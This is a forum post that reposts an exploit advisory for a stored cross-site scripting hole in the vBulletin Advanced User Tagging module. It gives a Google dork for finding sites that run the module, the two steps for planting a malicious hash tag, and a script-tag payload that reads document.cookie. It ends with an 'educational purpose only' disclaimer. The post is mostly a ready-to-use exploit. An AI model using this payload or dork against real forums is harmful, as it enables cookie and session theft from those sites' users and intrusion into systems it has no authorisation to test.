Matt Posted July 11, 2013 Report Posted July 11, 2013 Description : The vBulletin Advanced User Tagging module suffers from a stored cross site scripting vulnerability.Author : []0iZy5Source : vBulletin Advanced User Tagging Cross Site Scripting ? Packet StormCode : ############################################################################################ Exploit Title: Advanced User Tagging vBulletin - Stored XSS Vulnerability# Google Dork: intext:usertag_pro# Date: 10.07.2013# Exploit Author: []0iZy5# Vendor Homepage: www.backtrack-linux.ro# Software Link: http://www.dragonbyte-tech.com/vbecommerce.php?productid=20&do=product# Version: vBulletin 3.8.x, vBulletin 4.x.x# Tested on: Linux & Windows############################################################################################# Stage 1: Go to -> UserCP -> Hash Tag Subscriptions# (Direct Link:) http://127.0.0.1/[path]/usertag.php?do=profile&action=hashsubscription## Stage 2: Add a malicious hash tag.# (Example:) "><script>alert(document.cookie)</script>############################################################################################# This was written for educational purpose only. use it at your own risk.# Author will be not responsible for any damage caused! user assumes all responsibility. # Intended for authorized web application pentesting only!########################################################################################### Quote
